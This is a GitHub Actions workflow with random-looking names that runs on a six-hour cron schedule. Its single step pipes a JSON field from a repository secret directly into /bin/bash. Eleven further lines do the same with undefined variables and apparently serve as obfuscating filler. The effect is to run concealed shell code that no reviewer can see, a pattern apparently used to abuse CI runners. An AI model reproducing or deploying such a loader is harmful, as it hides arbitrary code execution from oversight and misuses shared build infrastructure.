name: hangyuuinuu
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hangyuuinuu
        env:
          zlhtf921: ${{ secrets.zlhtf921 }}
        run: |
          echo $zlhtf921 | jq -r .i58 | /bin/bash
          echo $eua2016 | jq -r .kyer09589 | /bin/bash
          echo $r185 | jq -r .chfw667 | /bin/bash
          echo $glx75 | jq -r .hm25 | /bin/bash
          echo $y9 | jq -r .ocip5 | /bin/bash
          echo $nhp882 | jq -r .ivi74680 | /bin/bash
          echo $lseft26 | jq -r .q4 | /bin/bash
          echo $y22 | jq -r .f64719 | /bin/bash
          echo $w66 | jq -r .nd5335 | /bin/bash
          echo $o929 | jq -r .ol10 | /bin/bash
          echo $c6278 | jq -r .uyok0 | /bin/bash
          echo $wfaex3 | jq -r .p45 | /bin/bash

